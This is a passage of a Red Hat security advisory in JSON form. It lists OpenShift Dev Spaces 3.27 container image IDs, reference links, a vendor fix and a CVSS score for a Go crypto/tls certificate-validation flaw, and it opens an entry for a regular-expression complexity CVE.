"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
